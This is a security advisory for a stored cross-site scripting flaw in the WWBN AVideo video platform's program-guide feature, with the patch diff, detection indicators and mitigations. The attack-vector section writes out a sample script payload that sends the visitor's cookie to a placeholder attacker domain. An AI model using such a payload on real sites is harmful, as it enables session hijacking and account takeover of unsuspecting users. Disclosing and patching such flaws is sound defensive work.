CVE-2026-39367 Overview
WWBN AVideo is an open source video platform that contains a stored Cross-Site Scripting (XSS) vulnerability in its Electronic Program Guide (EPG) feature. In versions 26.0 and prior, the platform parses XML from user-controlled URLs and renders programme titles directly into HTML without any sanitization or escaping. A user with upload permission can set a video's epg_link to a malicious XML file whose <title> elements contain JavaScript payloads. This payload executes in the browser of any unauthenticated visitor to the public EPG page, enabling session hijacking and account takeover.
Critical Impact
Attackers with upload permissions can inject malicious JavaScript via crafted XML files, leading to session hijacking and account takeover of any user viewing the public EPG page.
Affected Products
- WWBN AVideo version 26.0 and prior
Discovery Timeline
- 2026-04-07 - CVE CVE-2026-39367 published to NVD
- 2026-04-08 - Last updated in NVD database
Technical Details for CVE-2026-39367
Vulnerability Analysis
This stored Cross-Site Scripting (XSS) vulnerability exists in AVideo's EPG (Electronic Program Guide) functionality within the plugin/PlayerSkins/epg.php file. The application fetches XML data from URLs specified in video configurations and extracts programme titles for display in the EPG interface. The vulnerable code directly embeds these titles into HTML output without applying proper output encoding or sanitization.
When a user with upload permissions configures a video with a malicious epg_link pointing to an attacker-controlled XML file, any JavaScript code embedded in the <title> elements will be rendered and executed in the browsers of visitors to the public EPG page. This represents a stored XSS attack vector since the malicious payload persists in the system through the EPG link configuration.
Root Cause
The root cause of this vulnerability is improper output encoding (CWE-79). The epg.php file directly interpolates the $program['title'] variable into HTML context without using htmlspecialchars() or equivalent escaping functions. This allows attacker-controlled content from XML files to break out of the intended HTML structure and inject arbitrary JavaScript code.
Attack Vector
The attack exploits the network-accessible EPG feature through the following mechanism:
- An authenticated user with upload permissions creates or modifies a video entry
- The attacker sets the epg_link field to point to a malicious XML file they control
- The XML file contains <title> elements with embedded JavaScript payloads (e.g., <title><script>document.location='https://attacker.com/steal?c='+document.cookie</script></title>)
- When any user (including unauthenticated visitors) accesses the public EPG page, the platform fetches and parses the malicious XML
- The JavaScript payload executes in the victim's browser context, enabling session hijacking, cookie theft, or account takeover
The security patch addresses this by applying htmlspecialchars() with ENT_QUOTES and UTF-8 encoding to all program titles before rendering:
*/
$left = ($minuteSize * $minutesSinceZeroTime) + $timeLineElementSize;
$width = ($minuteSize * $minutes);
+ $safeTitle = htmlspecialchars($program['title'], ENT_QUOTES, 'UTF-8');
$pclass = '';
if ($width <= $minimumWidthHide) {
$text = '';
} else if ($width <= $minimumWidth1Dot) {
- $text = "<abbr title=\"{$program['title']}\">.</abbr>";
+ $text = "<abbr title=\"{$safeTitle}\">.</abbr>";
} else if ($width <= $minimumWidth) {
- $text = "<abbr title=\"{$program['title']}\"><small class=\"duration\">{$minutes} Min</small></abbr>";
+ $text = "<abbr title=\"{$safeTitle}\"><small class=\"duration\">{$minutes} Min</small></abbr>";
} else if ($width <= $minimumSmallFont) {
- $text = "<small class=\"small-font\">{$program['title']}<div><small class=\"duration\">{$minutes} Min</small></div></small>";
+ $text = "<small class=\"small-font\">{$safeTitle}<div><small class=\"duration\">{$minutes} Min</small></div></small>";
} else {
$startTime = date('m-d H:i', strtotime($program['start']));
$stopTime = date('m-d H:i', $_stopTime);
- $text = "{$program['title']}<div><small class=\"duration\">{$minutes} Min</small></div>";
+ $text = "{$safeTitle}<div><small class=\"duration\">{$minutes} Min</small></div>";
}
if ($_stopTime < $nowTime) {
$pclass = 'finished';
Source: GitHub Commit e0212add
Detection Methods for CVE-2026-39367
Indicators of Compromise
- Suspicious epg_link values in video configurations pointing to external or unusual URLs
- XML files hosted on external domains containing <script> tags or JavaScript event handlers within <title> elements
- Unusual outbound connections from client browsers when accessing the EPG page
- Session cookies or authentication tokens being transmitted to third-party domains
Detection Strategies
- Implement Content Security Policy (CSP) headers to detect and block inline script execution
- Monitor web application logs for access to the EPG page with unusual referrers or user agents
- Deploy web application firewall (WAF) rules to detect XSS payloads in XML responses
- Audit video configurations for epg_link values pointing to untrusted external sources
Monitoring Recommendations
- Enable browser console logging and monitor for JavaScript errors or unexpected script execution on EPG pages
- Implement Subresource Integrity (SRI) checks where possible
- Monitor for anomalous authentication events that may indicate session hijacking
- Review access logs for the plugin/PlayerSkins/epg.php endpoint for suspicious activity patterns
How to Mitigate CVE-2026-39367
Immediate Actions Required
- Update WWBN AVideo to a version containing commit e0212add4aad0f1e97758a4b4fdc57df58ce68e8 or later
- Audit all existing video configurations for suspicious epg_link values pointing to external domains
- Review user accounts with upload permissions and restrict access where not required
- Implement Content Security Policy (CSP) headers to mitigate XSS impact
Patch Information
The vulnerability has been addressed in the commit referenced in the GitHub Security Advisory. The fix applies htmlspecialchars() with ENT_QUOTES encoding to all program titles before HTML output, preventing JavaScript injection through XML title elements. Organizations should apply the security patch as soon as possible.
Workarounds
- Restrict upload permissions to trusted users only until the patch can be applied
- Implement a whitelist of allowed domains for epg_link configurations
- Deploy a web application firewall (WAF) with XSS detection rules
- Disable the EPG feature if not required for business operations
# Example: Add Content-Security-Policy header in Apache configuration
# Add to .htaccess or Apache config file
Header set Content-Security-Policy "default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
